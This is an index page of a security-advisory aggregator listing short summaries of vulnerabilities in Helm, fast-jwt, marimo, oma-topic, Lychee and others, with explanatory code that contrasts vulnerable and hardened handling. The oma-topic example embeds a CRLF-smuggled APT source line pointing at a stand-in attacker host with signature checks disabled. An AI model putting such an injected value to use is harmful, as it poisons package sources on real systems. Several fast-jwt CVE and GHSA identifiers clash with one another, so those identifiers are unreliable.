
Security Intel Hub 23479+

Curated security advisories, vulnerability analyses, and exploit write-ups — auto-cleaned and translated to English. Updated continuously.

CVE-2025-13926: Contemporary Controls BASC 20T Unauthenticated Access Vulnerability
www.cisa.gov · 2026-04-10

Successful exploitation of this vulnerability allows an attacker to enumerate functionalities associated with each co…

Helm Plugin Version Path Traversal Vulnerability Fix Analysis
github.com · 2026-04-10

Vulnerability name: Helm Plugin Version Path Traversal (plugin version path traversal). Vulnerability type: Insuffici…

fast-jwt ReDoS Vulnerability (CVE-2025-35941) and Fix Details
github.com · 2026-04-10

CVE ID: CVE-2025-35941 / GHSA-cj9d-ghj4-fxwf. Vulnerability type: ReDoS (Regular Expression Denial of Service). Description: In the…

Helm Plugin Install Signature Verification Bypass Fix
github.com · 2026-04-10

In Helm's plugin installation functionality, when the signature verification option (`--verify`) is enabled, the system previously only printed a w…

fast-jwt CVE-2020-35040: Stateful Regex Non-deterministic Validation Bypass
github.com · 2026-04-10

CVE ID: CVE-2020-35040. Vulnerability type: Non-deterministic validation caused by stateful regular expressions (Stateful regexp caus…

fast-jwt ReDoS Vulnerability Analysis and POC
github.com · 2026-04-10

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the `fast-jwt` library. When the `allowedAud` (or other `allowed*`) validation options are configured …

fast-jwt CVE-2026-35041 ReDoS Vulnerability and Fix Analysis
github.com · 2026-04-10

CVE ID: CVE-2026-35041. GHSA ID: GHSA-cjw9-ghj4-fwxf. Vulnerability type: ReDoS (Regular Expression Denial of Service). Descr…

Helm v4.1.4 Security Fixes: Path Traversal, Unsigned Plugin Bypass
github.com · 2026-04-10

The Helm v4.1.4 release notes list three primary security fixes: 1. GHSA-hr2v-4r36-88hr: Helm Chart extraction output directory collapse vulne…

oma-topic CRLF Injection in Topic Manifests Leading to APT Source Poisoning
github.com · 2026-04-10

Vulnerability name: oma-topic: 'name' Field in Topic Manifests (topic.json) May Allow CRLF Injecti…

oma-topics Control Character Injection Leading to Malicious APT Source Injection
github.com · 2026-04-10

In the `oma-topics` module, control characters (such as newlines) within the `name` field of the `topics.json` file are not filtered, allowing …

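The two oma-topic entries above describe the same shape of bug: a manifest field that reaches an APT sources file verbatim. The following is an added illustration, not oma's code; it assumes a JSON manifest with a `name` field and a manager that writes one `deb <mirror>/<name> …` line per topic (the mirror URL, manifest contents and function names are constructed for the example).

```javascript
// Added illustration (not oma's code). Assumption: the topic manifest is a
// JSON array of objects with a "name" field, and each enabled topic is
// rendered as one "deb <MIRROR>/<name> stable main" line in an APT source file.

const MIRROR = 'https://repo.example.org/topics'; // hypothetical mirror

// Constructed sample manifests: one benign, one whose name carries CRLF
// followed by an attacker-controlled deb line. "[trusted=yes]" is a real APT
// option that disables signature checking for that source; the trailing "#"
// comments out whatever the renderer appends after the injected name.
const BENIGN_MANIFEST = JSON.stringify([
  { name: 'kernel-6.x', description: 'constructed benign topic' },
]);
const MALICIOUS_MANIFEST = JSON.stringify([
  { name: 'kernel-6.x', description: 'constructed benign topic' },
  {
    name: 'gnome-48\r\ndeb [trusted=yes] http://evil.example/ stable main #',
    description: 'constructed malicious topic',
  },
]);

// Vulnerable renderer: interpolates the name without any filtering.
function renderSourcesUnsafe(manifestJson) {
  return JSON.parse(manifestJson)
    .map((t) => `deb ${MIRROR}/${t.name} stable main`)
    .join('\n');
}

// Read the rendered text the way a line-oriented sources parser would and
// return every "deb" line, so an injected entry shows up as an extra line.
function debLines(sourcesText) {
  return sourcesText.split(/\r?\n/).filter((l) => l.startsWith('deb '));
}

// Hardened: allow only a conservative character set. Anything outside
// [A-Za-z0-9._+-] is rejected, which excludes CR, LF, NUL, tabs, spaces and
// the "[" that introduces APT options.
const TOPIC_NAME = /^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$/;

function isValidTopicName(name) {
  return typeof name === 'string' && TOPIC_NAME.test(name);
}

function renderSourcesSafe(manifestJson) {
  return JSON.parse(manifestJson)
    .map((t) => {
      if (!isValidTopicName(t.name)) {
        throw new Error(`rejected topic name ${JSON.stringify(t.name)}`);
      }
      return `deb ${MIRROR}/${t.name} stable main`;
    })
    .join('\n');
}
```

An allowlist on the name is preferable to stripping `\r` and `\n`, because APT's one-line format also treats spaces, tabs and `[` as structure; a blocklist that only removes newlines still lets a name smuggle in options such as `[trusted=yes]`.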
marimo /terminal/ws Unauthenticated RCE Vulnerability Fix
github.com · 2026-04-10

GitHub Pull Request #9098 addresses a security vulnerability present in the `./ws/terminal` endpoint. Previously, this endpoint lacked authenticati…

Helm Chart Provenance Verification and Integrity Protection Guide
helm.sh · 2026-04-10

This page introduces Helm's provenance and integrity mechanisms rather than a specific security advisory. It details how to use PGP/GnuPG and Keybase.io to e…

marimo Terminal WebSocket Authentication Bypass Fix
github.com · 2026-04-10

This is an authentication bypass vulnerability. In the `marimo` project's terminal route, the authentication logic was either miss…

fast-jwt Stateful RegExp Logical DoS (CVE-2026-35040)
github.com · 2026-04-10

Vulnerability name: Addendum: Stateful RegExp (/g or /y) causes non-deterministic allowed-c…

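Both fast-jwt stateful-RegExp entries above (the CVE-2020-35040 and CVE-2026-35040 listings) turn on one JavaScript property: `RegExp.prototype.test` on a regex with the `g` or `y` flag advances and reuses `lastIndex` between calls. The block below is an added illustration, not fast-jwt's code; `claimMatches` and its hardened variants are hypothetical names standing in for an allowed-claim check that accepts either a string or a caller-supplied RegExp.

```javascript
// Added illustration (not fast-jwt's code). Hypothetical matcher: the
// allowed value for a claim such as aud may be a string or a RegExp, as an
// allowlist-style option commonly permits.
function claimMatches(allowed, value) {
  return allowed instanceof RegExp ? allowed.test(value) : allowed === value;
}

// Run the identical check n times against the same allowed value and record
// each outcome. With a /g or /y RegExp the outcomes alternate, because after
// a successful match lastIndex points past the end of the string, the next
// test() starts there and fails, and the failure resets lastIndex to 0.
function repeatedChecks(allowed, value, n) {
  const results = [];
  for (let i = 0; i < n; i++) results.push(claimMatches(allowed, value));
  return results;
}

// Hardened variant 1: refuse stateful RegExps at configuration time.
function claimMatchesStateless(allowed, value) {
  if (allowed instanceof RegExp) {
    if (allowed.global || allowed.sticky) {
      throw new TypeError('allowed-value RegExp must not use the g or y flag');
    }
    return allowed.test(value);
  }
  return allowed === value;
}

// Hardened variant 2: keep the caller's RegExp but reset its cursor so every
// check starts from position 0, independent of earlier checks.
function claimMatchesReset(allowed, value) {
  if (allowed instanceof RegExp) {
    allowed.lastIndex = 0;
    return allowed.test(value);
  }
  return allowed === value;
}
```

The security consequence is that acceptance depends on how many tokens were checked before, not on the token itself: a valid audience is rejected on every second call (the logical DoS the addendum names), and the allowlist no longer gives a stable answer. Validating the configured RegExps once, as the first variant does, fails fast instead of silently behaving differently under load.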
PE File Parser Heap Corruption Fix Analysis
github.com · 2026-04-10

This commit addresses a heap corruption vulnerability present in the `pe_page_hash_calc` function. The primary risk factors include: 1. Null pointer dereference: The…

Marimo CVE-2025-39587 Pre-Auth RCE via /terminal/ws WebSocket
github.com · 2026-04-10

The `/terminal/ws` terminal WebSocket endpoint in Marimo contains a pre-authentication Remote Code Execution (RCE) vulnerability. This endpoint…

v2board AuthController Email Verification Logic Error Causing DoS
github.com · 2026-04-10

In the `v2board` project, the `AuthController.php` file contains a critical logic flaw within the `register`, `login`, and `forget` methods. During…

Lychee v7.5.3 SQL Operator Precedence Vulnerability (CVE-2026-39957) Bypasses Authorization
github.com · 2026-04-10

A SQL operator precedence vulnerability exists in the `SharingController::listAll()` method (line 138) of the Lychee Gallery software. This flaw allows the `orWhereNotNull(u…

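The Lychee entry above is an instance of a general query-builder footgun: an `orWhere…` call appended to a chain of `where` calls is emitted without parentheses, and since SQL's AND binds tighter than OR, the ownership check only guards the first branch. The following is an added illustration and not Lychee's code; the table, column names and the SQL strings are constructed, and because no database is embedded, the same predicate is applied to in-memory rows (JavaScript's `&&`/`||` have the same relative precedence as SQL's AND/OR, so the filters evaluate exactly what the two WHERE clauses would).

```javascript
// Added illustration (not Lychee's code). Hypothetical listing query for
// "albums the caller may see": owned and public, or owned and shared by token.

// What a chained ->where('owner_id', $uid)->where('is_public', 1)
// ->orWhereNotNull('share_token') typically emits: no grouping, so the
// share_token branch applies to every row regardless of owner.
const SQL_VULNERABLE =
  'SELECT id FROM albums WHERE owner_id = ? AND is_public = 1 OR share_token IS NOT NULL';

// Grouped form (in Laravel, wrap the OR branches in a closure).
const SQL_FIXED =
  'SELECT id FROM albums WHERE owner_id = ? AND (is_public = 1 OR share_token IS NOT NULL)';

// Constructed table: two owners, four albums.
const ALBUMS = [
  { id: 1, owner_id: 1, is_public: 1, share_token: null },
  { id: 2, owner_id: 1, is_public: 0, share_token: 'tok-a' },
  { id: 3, owner_id: 2, is_public: 0, share_token: 'tok-b' },
  { id: 4, owner_id: 2, is_public: 0, share_token: null },
];

// Evaluates SQL_VULNERABLE's WHERE clause: (owner && public) || shared.
function listAllVulnerable(rows, uid) {
  return rows
    .filter((r) => r.owner_id === uid && r.is_public === 1 || r.share_token !== null)
    .map((r) => r.id);
}

// Evaluates SQL_FIXED's WHERE clause: owner && (public || shared).
function listAllFixed(rows, uid) {
  return rows
    .filter((r) => r.owner_id === uid && (r.is_public === 1 || r.share_token !== null))
    .map((r) => r.id);
}

// Authorization check on a result set: any returned id owned by someone
// other than the caller is a leak.
function leakedIds(rows, uid, ids) {
  return ids.filter((id) => rows.find((r) => r.id === id).owner_id !== uid);
}
```

A quick regression test for this class of bug is exactly `leakedIds`: run the listing as each user and assert that nothing owned by another user comes back. It catches the precedence mistake without needing to inspect the generated SQL.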
HashGraph JS Custom Logic Worker Sandbox Escape via Function() Execution
github.com · 2026-04-10

The HashGraph JavaScript Custom Logic worker currently executes user-provided code using `Function()`. This causes user code to …

V2Board/Xboard Unauthorized Account Takeover via Magic Link Token Leakage
chocapikk.com · 2026-04-10

The Xboard and V2Board panels contain an unauthorized account takeover vulnerability caused by the "Magic Link Login" feature. When an administrator enables this feature, an…


All articles are auto-cleaned (markdown extraction + LLM noise removal) and translated to English by our offline pipeline. Source URL is always preserved at the bottom of each article.
